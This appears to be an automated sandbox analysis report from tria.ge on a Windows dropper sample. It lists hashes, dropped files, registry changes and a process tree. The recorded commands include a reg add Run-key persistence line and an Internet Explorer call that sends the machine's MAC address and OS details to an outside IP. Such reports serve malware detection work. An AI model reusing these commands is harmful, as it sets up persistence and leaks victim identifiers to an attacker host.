Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
153s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
01/12/2022, 13:51
Static task
static1
Behavioral task
behavioral1
Sample
ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe
Resource
win10v2004-20220812-en
General
-
Target
ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe
-
Size
365KB
-
MD5
56d60722af183b394ddb2760e261909e
-
SHA1
e87182c5b3a6b772a26d601aef6366182c560915
-
SHA256
ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda
-
SHA512
ed852a3cb6bb720882c4b34e5b2117e59c8c64c0e83ec0441cd90ce394061b90f8b35210d31abc72094c79a039bb97ff52f82cf9276e8ea5c766e91f9efb7862
-
SSDEEP
6144:pTfFDbRnOTr085p8mkJeapssUZn7kyPTd4lnqukJja9zTK:v5Oc85prapshZn7/B5cG
Malware Config
Signatures
-
Executes dropped EXE 3 IoCs
pid Process 980 t2.exe 1076 bho.exe 1720 test.exe -
resource yara_rule behavioral1/files/0x00060000000144a3-55.dat upx behavioral1/files/0x00060000000144a3-56.dat upx behavioral1/files/0x00060000000144a3-58.dat upx behavioral1/memory/980-64-0x0000000000400000-0x0000000000421000-memory.dmp upx behavioral1/files/0x00060000000142e0-69.dat upx behavioral1/files/0x00060000000142e0-70.dat upx behavioral1/files/0x00060000000142e0-73.dat upx behavioral1/memory/1720-75-0x0000000000400000-0x0000000000424000-memory.dmp upx behavioral1/memory/980-79-0x0000000000400000-0x0000000000421000-memory.dmp upx behavioral1/files/0x00060000000144a3-83.dat upx -
Loads dropped DLL 6 IoCs
pid Process 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\micrososot = "c:\\program files (x86)\\winsoft9\\t2.exe " reg.exe -
Drops file in Program Files directory 32 IoCs
description ioc Process File created C:\Program Files (x86)\winsoft9\9ptv.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\game.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\mm.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\test.exe ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\3.vbs ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\77zb.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\kusila.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\kusila.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\taobao.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\3.vbs ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\game.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\mm.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\t2.exe ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\bho.exe ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\77zb.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\qq.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\taobao.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\1.vbs ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\WINDOWS\time\mian.dll ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\qq.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\test.exe ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\WINDOWS\time ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\__tmp_rar_sfx_access_check_7103552 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\9ptv.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\1.vbs ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\WINDOWS\time\mian.dil ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\WINDOWS ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\WINDOWS\time\mian.dil ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\WINDOWS\time\mian.dll ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\t2.exe ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\bho.exe ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Survival_0.txt t2.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000899d0fe20cdd2f4485282e179bf8630a00000000020000000000106600000001000020000000ed27435191808ab6e0f7bb9fc1c7c0b24cf132a8238a480b9422cb8d038992fa000000000e8000000002000020000000f13871f3634f32e7834fb7749d26d6ee89fd2b0915e9f2dc1587c62387f7d38a20000000758b19bd4efafeb27b5c76455b741a0eeeac58994fb08a673dcdb12e6461b7cf40000000b6e22b81edeca525304df8e7b4c880ebcdd5b4cd90c3d69d415198067d45580bf5d0333558a700eaa4c0cc5ba15f68879a1d1f03f67f8d7eeb27beb162992c3c iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 50e0ee9e5507d901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376261085" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main t2.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\2022123 test.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000899d0fe20cdd2f4485282e179bf8630a000000000200000000001066000000010000200000007cbbeeba817ed3337907d5e1aec07dcfbf55166fd5a08edea97c535a84e342e2000000000e8000000002000020000000b50f7b3de09b89a52243e9d9ad8372cd936646161e41d9e38fe25dc699d4edbd900000003a4862c23846deccd45aa770721e5be25f7569a3562c2474c5910ee41908c6ab798ba83682f1ea175825bbc6216833e2e43286efb8b9682a724a3c7b7bda108a214e09fafb1cddbe5c7b4337b97e98fed53de91fbf1915de1d9b8a9a09ab4b7e6a4082112f14de1eb6fafa1edbdacb6944c6b81c227dcfcb4f1fe45618a33ff8bd0dcd5592c2b669f61ce111887bd1f940000000931f623c22f0feae3b545fefaf953ca964fea2ccee387a43de3657f34248d98d623714eb42df271c295b0d45ff261e587d28fbfa8cd33b7a6d0984ef4ce319a8 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D63F5DF0-7348-11ED-B390-DA7E66F9F45D} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D5EE6F31-7348-11ED-B390-DA7E66F9F45D} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe -
Suspicious behavior: EnumeratesProcesses 38 IoCs
pid Process 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe 980 t2.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1184 iexplore.exe 1380 iexplore.exe 1380 iexplore.exe -
Suspicious use of SetWindowsHookEx 17 IoCs
pid Process 980 t2.exe 980 t2.exe 980 t2.exe 1184 iexplore.exe 1184 iexplore.exe 1380 iexplore.exe 1380 iexplore.exe 272 IEXPLORE.EXE 272 IEXPLORE.EXE 1840 IEXPLORE.EXE 1840 IEXPLORE.EXE 1380 iexplore.exe 1380 iexplore.exe 964 IEXPLORE.EXE 964 IEXPLORE.EXE 964 IEXPLORE.EXE 964 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 1632 wrote to memory of 980 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 27 PID 1632 wrote to memory of 980 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 27 PID 1632 wrote to memory of 980 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 27 PID 1632 wrote to memory of 980 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 27 PID 1632 wrote to memory of 1076 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 28 PID 1632 wrote to memory of 1076 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 28 PID 1632 wrote to memory of 1076 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 28 PID 1632 wrote to memory of 1076 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 28 PID 1632 wrote to memory of 1720 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 29 PID 1632 wrote to memory of 1720 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 29 PID 1632 wrote to memory of 1720 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 29 PID 1632 wrote to memory of 1720 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 29 PID 1720 wrote to memory of 1380 1720 test.exe 31 PID 1720 wrote to memory of 1380 1720 test.exe 31 PID 1720 wrote to memory of 1380 1720 test.exe 31 PID 1720 wrote to memory of 1380 1720 test.exe 31 PID 1632 wrote to memory of 1776 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 30 PID 1632 wrote to memory of 1776 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 30 PID 1632 wrote to memory of 1776 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 30 PID 1632 wrote to memory of 1776 1632 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 30 PID 1184 wrote to memory of 272 1184 iexplore.exe 37 PID 1184 wrote to memory of 272 1184 iexplore.exe 37 PID 1184 wrote to memory of 272 1184 iexplore.exe 37 PID 1184 wrote to memory of 272 1184 iexplore.exe 37 PID 1380 wrote to memory of 1840 1380 iexplore.exe 36 PID 1380 wrote to memory of 1840 1380 iexplore.exe 36 PID 1380 wrote to memory of 1840 1380 iexplore.exe 36 PID 1380 wrote to memory of 1840 1380 iexplore.exe 36 PID 1380 wrote to memory of 964 1380 iexplore.exe 38 PID 1380 wrote to memory of 964 1380 iexplore.exe 38 PID 1380 wrote to memory of 964 1380 iexplore.exe 38 PID 1380 wrote to memory of 964 1380 iexplore.exe 38 PID 980 wrote to memory of 2020 980 t2.exe 40 PID 980 wrote to memory of 2020 980 t2.exe 40 PID 980 wrote to memory of 2020 980 t2.exe 40 PID 980 wrote to memory of 2020 980 t2.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe"C:\Users\Admin\AppData\Local\Temp\ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe"1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Program Files (x86)\winsoft9\t2.exe"C:\Program Files (x86)\winsoft9\t2.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "micrososot" /d "c:\program files (x86)\winsoft9\t2.exe " /f3⤵
- Adds Run key to start application
PID:2020
-
-
-
C:\Program Files (x86)\winsoft9\bho.exe"C:\Program Files (x86)\winsoft9\bho.exe"2⤵
- Executes dropped EXE
PID:1076
-
-
C:\Program Files (x86)\winsoft9\test.exe"C:\Program Files (x86)\winsoft9\test.exe"2⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=da-7e-66-f9-f4-5d&os=Microsoft Windows XP&flag=dd36240e306c166dd7f0613efeb0c076&user=test3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1380 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1840
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1380 CREDAT:406530 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:964
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\winsoft9\1.vbs"2⤵PID:1776
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1184 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:272
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
154B
MD5efafb2e23c3a56c7c0a585c8f3a74c15
SHA124e2f29d57199a01d8e521b2468cfb2e4d338b3a
SHA25645a4effd474083ae4bf4b8cef347f78c9d243aee6a7a9dd01b2fc9a069f26678
SHA5129bc509ead39fef370be722e2e90730ce089857107d4d1d273502f85da26e213031e8f3a1e14f7d174274bf936121ea067c438850d36c510ef0ab37f7b8cba2ee
-
Filesize
65KB
MD54ba9a7d68cf22eef4354e6695b14109c
SHA120b6adf9febd22fa74662bf8dfd5a4f5803eda38
SHA2569e57af5d4f49661f342fc3e3f77db9b5d04cc861d1c102c44bfb663e9a167fee
SHA512907c73851032ab3ac07ea33bcba794bfce3c429787e34e5e85724c9011abad6277b235613db6da8ecd47619327b2cff14af89792943f248282f7a5e386aa85ac
-
Filesize
12.9MB
MD5c59ad09f4eb12b46a7ba0a38227da51e
SHA106b7396f728ff236b8ef13d2416fef312e592939
SHA2569b46fb443da0aab5aa10aa0e630b2a8b30cd7476f559c0ead337af9f25095316
SHA512f6e3ad3230bd1beae8e30d17f1e7338a1a13cfb1c5eb3c79acdcaf1c1a3d20e7401f691e23df7e188b0ff6a0f81279bb5812893eab2493501cb232dee20ef145
-
Filesize
12.9MB
MD5715c3c7d943e785d326bf4d8940bfd2a
SHA1519ba001798b16ad089f409c738d869c91202d8c
SHA256b1d0c0813470896ca9d85c7e7604d10ae63c528f4d85f70a77e82233d659bfd7
SHA5120901f98b09ed9136062c59fd5feed75b514dffa94bc272d1564ca574822e03b0fb9b7bab975858838443dfe3d243d4af92596789d0a2f0f52b52014207fddf90
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{D5EE6F31-7348-11ED-B390-DA7E66F9F45D}.dat
Filesize5KB
MD54532a909c358f27ec595f9aea09f77ae
SHA1d81b4fe9651950227688121c9a60f1c3f7081acd
SHA2569ff448d77fba4deaf72c8472426faba143ce542bceda8c4747837e38c24d01a4
SHA512b2e0c6e5e4b4633521535038ee244d2e8f979ee0395a699d678a12dca9d174cbc425f104f7adccf50f4b0d3be3601f859b71218eb8b0a53909d37f62933fc512
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{D63F5DF0-7348-11ED-B390-DA7E66F9F45D}.dat
Filesize4KB
MD5a5569ca4afca676b859f250b1e747858
SHA1b7f88a0577e405e0875ea80a0d719debbc5547d7
SHA256ffd7b5d98a4c2c3da69261d48933bce5018d5678a762dc2d73f0f5a1b357af96
SHA512e7a96ceedc4aa6c9ec590fbb89f8175143d90d78c76d1da051e421baf1d7892398de3084a3ac600a4c7910296c7e43d1dabfb6f7d2c25fe8c64824cd19e037f1
-
Filesize
12.9MB
MD5c59ad09f4eb12b46a7ba0a38227da51e
SHA106b7396f728ff236b8ef13d2416fef312e592939
SHA2569b46fb443da0aab5aa10aa0e630b2a8b30cd7476f559c0ead337af9f25095316
SHA512f6e3ad3230bd1beae8e30d17f1e7338a1a13cfb1c5eb3c79acdcaf1c1a3d20e7401f691e23df7e188b0ff6a0f81279bb5812893eab2493501cb232dee20ef145
-
Filesize
65KB
MD54ba9a7d68cf22eef4354e6695b14109c
SHA120b6adf9febd22fa74662bf8dfd5a4f5803eda38
SHA2569e57af5d4f49661f342fc3e3f77db9b5d04cc861d1c102c44bfb663e9a167fee
SHA512907c73851032ab3ac07ea33bcba794bfce3c429787e34e5e85724c9011abad6277b235613db6da8ecd47619327b2cff14af89792943f248282f7a5e386aa85ac
-
Filesize
65KB
MD54ba9a7d68cf22eef4354e6695b14109c
SHA120b6adf9febd22fa74662bf8dfd5a4f5803eda38
SHA2569e57af5d4f49661f342fc3e3f77db9b5d04cc861d1c102c44bfb663e9a167fee
